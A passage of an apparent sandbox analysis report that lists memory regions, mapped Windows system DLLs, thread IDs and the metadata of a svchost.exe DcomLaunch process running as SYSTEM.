"eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 3503 start_va = 0x7ff859700000 end_va = 0x7ff859713fff monitored = 0 entry_point = 0x7ff8597052e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3504 start_va = 0x7ff859a20000 end_va = 0x7ff859c07fff monitored = 0 entry_point = 0x7ff859a4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3505 start_va = 0x7ff85a2c0000 end_va = 0x7ff85a329fff monitored = 0 entry_point = 0x7ff85a2f6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3506 start_va = 0x7ff85bea0000 end_va = 0x7ff85bfbbfff monitored = 0 entry_point = 0x7ff85bee02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3507 start_va = 0x7ff85c360000 end_va = 0x7ff85c3fcfff monitored = 0 entry_point = 0x7ff85c3678a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3508 start_va = 0x7ff85cb80000 end_va = 0x7ff85cc2cfff monitored = 0 entry_point = 0x7ff85cb981a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3509 start_va = 0x7ff85cc30000 end_va = 0x7ff85cc8afff monitored = 0 entry_point = 0x7ff85cc438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3510 start_va = 0x7ff85cf10000 end_va = 0x7ff85cf7afff monitored = 0 entry_point = 0x7ff85cf290c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3511 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 281 os_tid = 0x61c Thread: id = 282 os_tid = 0x614 Thread: id = 283 os_tid = 0x608 Thread: id = 284 os_tid = 0x290 Thread: id = 285 os_tid = 0x3ac Thread: id = 286 os_tid = 0x39c Thread: id = 287 os_tid = 0x38c Thread: id = 288 os_tid = 0x388 Thread: id = 289 os_tid = 0x380 Thread: id = 290 os_tid = 0x360 Thread: id = 291 os_tid = 0x2c0 Thread: id = 292 os_tid = 0x28c Thread: id = 293 os_tid = 0x270 Thread: id = 294 os_tid = 0x26c Process: id = "26" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x595b7000" os_pid = "0x274" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BrokerInfrastructure" [0xa], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\DeviceInstall" [0xa], "NT SERVICE\\LSM" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT SERVICE\\SystemEventsBroker" [0xa], "NT AUTHORITY\\Logon Session 00000000:00005cc3" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 3512 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3513 start_va = 0x20000 end_va = 0x24fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3514 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3515 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3516 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 3517 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 3518 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 3519 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3520 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 3521 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 3522 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 3523 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3524 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3525 start_va = 0x480000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 3526 start_va = 0x500000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3527 start_va = 0x580000 end_va = 0x586fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 3528 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 3529 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 3530 start_va = 0x5b0000 end_va = 0x5b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 3531 start_va = 0x5c0000 end_va = 0x5c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 3532 start_va = 0x5d0000 end_va = 0x5d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 3533 start_va = 0x5e0000 end_va = 0x5e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 3534 start_va = 0x5f0000 end_va = 0x5f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 3535 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 3536 start_va = 0x700000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 3537 start_va = 0x780000 end_va = 0x780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 3538 start_va = 0x790000 end_va = 0x796fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 3539 start_va = 0x7a0000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 3540 start_va = 0x820000 end_va = 0x820fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 3541 start_va = 0x830000 end_va = 0x830fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 3542 start_va = 0x840000 end_va = 0x840fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 3543 start_va = 0x850000 end_va = 0x87dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 3544 start_va = 0x890000 end_va = 0x896fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 3545 start_va = 0x900000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 3546 start_va = 0xa00000 end_va = 0xafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 3547 start_va = 0xb00000 end_va = 0xbfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 3548 start_va = 0xc00000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 3549 start_va = 0xd00000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 3550 start_va = 0xe00000 end_va = 0xefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 3551 start_va = 0xf00000 end_va = 0xffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 3552 start_va = 0x1000000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 3553 start_va = 0x1100000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 3554 start_va = 0x1200000 end_va = 0x127ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 3555 start_va = 0x12a0000 end_va = 0x12a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 3556 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 3557 start_va = 0x1400000 end_va = 0x14fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001400000" filename = "" Region: id = 3558 start_va = 0x1500000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 3559 start_va = 0x1600000 end_va = 0x1936fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3560 start_va = 0x1940000 end_va = 0x1a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 3561 start_va = 0x1a40000 end_va = 0x1b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a40000" filename = "" Region: id = 3562 start_va = 0x1b40000 end_va = 0x1bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b40000" filename = "" Region: id = 3563 start_va = 0x1c00000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 3564 start_va = 0x1d00000 end_va = 0x20fafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d00000" filename = "" Region: id = 3565 start_va = 0x2100000 end_va = 0x2287fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 3566 start_va = 0x2290000 end_va = 0x2410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002290000" filename = "" Region: id = 3567 start_va = 0x2420000 end_va = 0x24dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002420000" filename = "" Region: id = 3568 start_va = 0x24e0000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 3569 start_va = 0x25e0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 3570 start_va = 0x26e0000 end_va = 0x275ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 3571 start_va = 0x2760000 end_va = 0x27dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 3572 start_va = 0x27e0000 end_va = 0x28bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 3573 start_va = 0x28c0000 end_va = 0x29bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028c0000" filename = "" Region: id = 3574 start_va = 0x29c0000 end_va = 0x2abffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029c0000" filename = "" Region: id = 3575 start_va = 0x2ac0000 end_va = 0x2bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ac0000" filename = "" Region: id = 3576 start_va = 0x2bc0000 end_va = 0x2cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bc0000" filename = "" Region: id = 3577 start_va = 0x2d00000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 3578 start_va = 0x2e00000 end_va = 0x2e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 3579 start_va = 0x2f80000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f80000" filename = "" Region: id = 3580 start_va = 0x3000000 end_va = 0x307ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 3581 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3582 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 3583 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 3584 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 3585 start_va = 0x7ff6c7f10000 end_va = 0x7ff6c7f1cfff monitored = 0 entry_point = 0x7ff6c7f13980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 3586 start_va = 0x7ff84a240000 end_va = 0x7ff84a25afff monitored = 0 entry_point = 0x7ff84a24af40 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 3587 start_va = 0x7ff84c250000 end_va = 0x7ff84c264fff monitored = 0 entry_point = 0x7ff84c251ab0 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 3588 start_va = 0x7ff84c420000 end_va = 0x7ff84c42dfff monitored = 0 entry_point = 0x7ff84c4222f0 region_type = mapped_file name = "sebbackgroundmanagerpolicy.dll" filename = "\\Windows\\System32\\SebBackgroundManagerPolicy.dll" (normalized: "c:\\windows\\system32\\sebbackgroundmanagerpolicy.dll") Region: id = 3589 start_va = 0x7ff84c430000 end_va = 0x7ff84c447fff monitored = 0 entry_point = 0x7ff84c433f00 region_type = mapped_file name = "windows.networking.backgroundtransfer.backgroundmanagerpolicy.dll" filename = "\\Windows\\System32\\Windows.Networking.BackgroundTransfer.BackgroundManagerPolicy.dll" (normalized: "c:\\windows\\system32\\windows.networking.backgroundtransfer.backgroundmanagerpolicy.dll") Region: id = 3590 start_va = 0x7ff84c450000 end_va = 0x7ff84c45bfff monitored = 0 entry_point = 0x7ff84c454b50 region_type = mapped_file name = "cbtbackgroundmanagerpolicy.dll" filename = "\\Windows\\System32\\CbtBackgroundManagerPolicy.dll" (normalized: "c:\\windows\\system32\\cbtbackgroundmanagerpolicy.dll") Region: id = 3591 start_va = 0x7ff84c460000 end_va = 0x7ff84c485fff monitored = 0 entry_point = 0x7ff84c467a80 region_type = mapped_file name = "acpbackgroundmanagerpolicy.dll" filename = "\\Windows\\System32\\ACPBackgroundManagerPolicy.dll" (normalized: "c:\\windows\\system32\\acpbackgroundmanagerpolicy.dll") Region: id = 3592 start_va = 0x7ff84c490000 end_va = 0x7ff84c49ffff monitored = 0 entry_point = 0x7ff84c4923f0 region_type = mapped_file name = "backgroundmediapolicy.dll" filename = "\\Windows\\System32\\BackgroundMediaPolicy.dll" (normalized: "c:\\windows\\system32\\backgroundmediapolicy.dll") Region: id = 3593 start_va = 0x7ff84c870000 end_va = 0x7ff84c8b3fff monitored = 0 entry_point = 0x7ff84c87c010 region_type = mapped_file name = "execmodelclient.dll" filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll") Region: id = 3594 start_va = 0x7ff84e1b0000 end_va = 0x7ff84e1c0fff monitored = 0 entry_point = 0x7ff84e1b5e90 region_type = mapped_file name = "licensemanagerapi.dll" filename = "\\Windows\\System32\\LicenseManagerApi.dll" (normalized: "c:\\windows\\system32\\licensemanagerapi.dll") Region: id = 3595 start_va = 0x7ff84ee50000 end_va = 0x7ff84eee3fff monitored = 0 entry_point = 0x7ff84ee89210 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 3596 start_va = 0x7ff84eef0000 end_va = 0x7ff84f192fff monitored = 0 entry_point = 0x7ff84ef16190 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 3597 start_va = 0x7ff8532b0000 end_va = 0x7ff8532bbfff monitored = 0 entry_point = 0x7ff8532b2830 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 3598 start_va = 0x7ff855b80000 end_va = 0x7ff855c11fff monitored = 0 entry_point = 0x7ff855bca780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 3599 start_va = 0x7ff855d50000 end_va = 0x7ff855d5ffff monitored = 0 entry_point = 0x7ff855d52c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 3600 start_va = 0x7ff856dc0000 end_va = 0x7ff857252fff monitored = 0 entry_point = 0x7ff856dcf760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 3601 start_va = 0x7ff8576d0000 end_va = 0x7ff85778dfff monitored = 0 entry_point = 0x7ff857712d40 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 3602 start_va = 0x7ff857b90000 end_va = 0x7ff857c08fff monitored = 0 entry_point = 0x7ff857bafb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 3603 start_va = 0x7ff857e00000 end_va = 0x7ff857e12fff monitored = 0 entry_point = 0x7ff857e02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3604 start_va = 0x7ff857f70000 end_va = 0x7ff857f90fff monitored = 0 entry_point = 0x7ff857f792a0 region_type = mapped_file name = "dab.dll" filename = "\\Windows\\System32\\dab.dll" (normalized: "c:\\windows\\system32\\dab.dll") Region: id = 3605 start_va = 0x7ff857fa0000 end_va = 0x7ff857fdffff monitored = 0 entry_point = 0x7ff857fb1960 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 3606 start_va = 0x7ff857fe0000 end_va = 0x7ff858042fff monitored = 0 entry_point = 0x7ff857ffc010 region_type = mapped_file name = "systemeventsbrokerserver.dll" filename = "\\Windows\\System32\\SystemEventsBrokerServer.dll" (normalized: "c:\\windows\\system32\\systemeventsbrokerserver.dll") Region: id = 3607 start_va = 0x7ff858130000 end_va = 0x7ff858156fff monitored = 0 entry_point = 0x7ff858137940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 3608 start_va = 0x7ff858210000 end_va = 0x7ff85830ffff monitored = 0 entry_point = 0x7ff858250f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 3609 start_va = 0x7ff858310000 end_va = 0x7ff85839cfff monitored = 0 entry_point = 0x7ff85833ac70 region_type = mapped_file name = "psmserviceexthost.dll" filename = "\\Windows\\System32\\PsmServiceExtHost.dll" (normalized: "c:\\windows\\system32\\psmserviceexthost.dll") Region: id = 3610 start_va = 0x7ff8583a0000 end_va = 0x7ff8583abfff monitored = 0 entry_point = 0x7ff8583a2480 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 3611 start_va = 0x7ff8583b0000 end_va = 0x7ff85846bfff monitored = 0 entry_point = 0x7ff8583ec480 region_type = mapped_file name = "lsm.dll" filename = "\\Windows\\System32\\lsm.dll" (normalized: "c:\\windows\\system32\\lsm.dll") Region: id = 3612 start_va = 0x7ff858470000 end_va = 0x7ff858499fff monitored = 0 entry_point = 0x7ff858478b90 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 3613 start_va = 0x7ff8584a0000 end_va = 0x7ff8584cffff monitored = 0 entry_point = 0x7ff8584af7c0 region_type = mapped_file name = "psmsrv.dll" filename = "\\Windows\\System32\\psmsrv.dll" (normalized: "c:\\windows\\system32\\psmsrv.dll") Region: id = 3614 start_va = 0x7ff8584d0000 end_va = 0x7ff858564fff monitored = 0 entry_point = 0x7ff8585036c0 region_type = mapped_file name = "bisrv.dll" filename = "\\Windows\\System32\\bisrv.dll" (normalized: "c:\\windows\\system32\\bisrv.dll") Region: id = 3615 start_va = 0x7ff8585f0000 end_va = 0x7ff8586d2fff monitored = 0 entry_point = 0x7ff85864e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3616 start_va = 0x7ff8586e0000 end_va = 0x7ff8586ebfff monitored = 0 entry_point = 0x7ff8586e2790 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 3617 start_va = 0x7ff8586f0000 end_va = 0x7ff858713fff monitored = 0 entry_point = 0x7ff8586f3260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 3618 start_va = 0x7ff858720000 end_va = 0x7ff858817fff monitored = 0 entry_point = 0x7ff85872d580 region_type = mapped_file name = "tdh.dll" filename = "\\Windows\\System32\\tdh.dll" (normalized: "c:\\windows\\system32\\tdh.dll") Region: id = 3619 start_va = 0x7ff858820000 end_va = 0x7ff858835fff monitored = 0 entry_point = 0x7ff858823630 region_type = mapped_file name = "umpoext.dll" filename = "\\Windows\\System32\\umpoext.dll" (normalized: "c:\\windows\\system32\\umpoext.dll") Region: id = 3620 start_va = 0x7ff858840000 end_va = 0x7ff858861fff monitored = 0 entry_point = 0x7ff8588475f0 region_type = mapped_file name = "umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 3621 start_va = 0x7ff858870000 end_va = 0x7ff85888ffff monitored = 0 entry_point = 0x7ff858871920 region_type = mapped_file name = "umpnpmgr.dll" filename = "\\Windows\\System32\\umpnpmgr.dll" (normalized: "c:\\windows\\system32\\umpnpmgr.dll") Region: id = 3622 start_va = 0x7ff858890000 end_va = 0x7ff858983fff monitored = 0 entry_point = 0x7ff85889a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 3623 start_va = 0x7ff858be0000 end_va = 0x7ff858c10fff monitored = 0 entry_point = 0x7ff858be7d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3624 start_va = 0x7ff858d00000 end_va = 0x7ff858d33fff monitored = 0 entry_point = 0x7ff858d1ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3625 start_va = 0x7ff858e50000 end_va = 0x7ff858e6efff monitored = 0 entry_point = 0x7ff858e55d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3626 start_va = 0x7ff859020000 end_va = 0x7ff859075fff monitored = 0 entry_point = 0x7ff859030bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3627 start_va = 0x7ff8590d0000 end_va = 0x7ff8590e6fff monitored = 0 entry_point = 0x7ff8590d79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3628 start_va = 0x7ff8591f0000 end_va = 0x7ff8591fafff monitored = 0 entry_point = 0x7ff8591f19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3629 start_va = 0x7ff8593d0000 end_va = 0x7ff8593fcfff monitored = 0 entry_point = 0x7ff8593e9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 3630 start_va = 0x7ff859560000 end_va = 0x7ff859578fff monitored = 0 entry_point = 0x7ff859565e10 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 3631 start_va = 0x7ff859580000 end_va = 0x7ff8595a8fff monitored = 0 entry_point = 0x7ff859594530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 3632 start_va = 0x7ff859700000 end_va = 0x7ff859713fff monitored = 0 entry_point = 0x7ff8597052e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3633 start_va = 0x7ff859720000 end_va = 0x7ff85972efff monitored = 0 entry_point = 0x7ff859723210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3634 start_va = 0x7ff859730000 end_va = 0x7ff85977afff monitored = 0 entry_point = 0x7ff8597335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3635 start_va = 0x7ff859a20000 end_va = 0x7ff859c07fff monitored = 0 entry_point = 0x7ff859a4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3636 start_va = 0x7ff859c70000 end_va = 0x7ff85a2b3fff monitored = 0 entry_point = 0x7ff859e364b0 region_type = mapped_file name = "windows.storage.dll" filename = 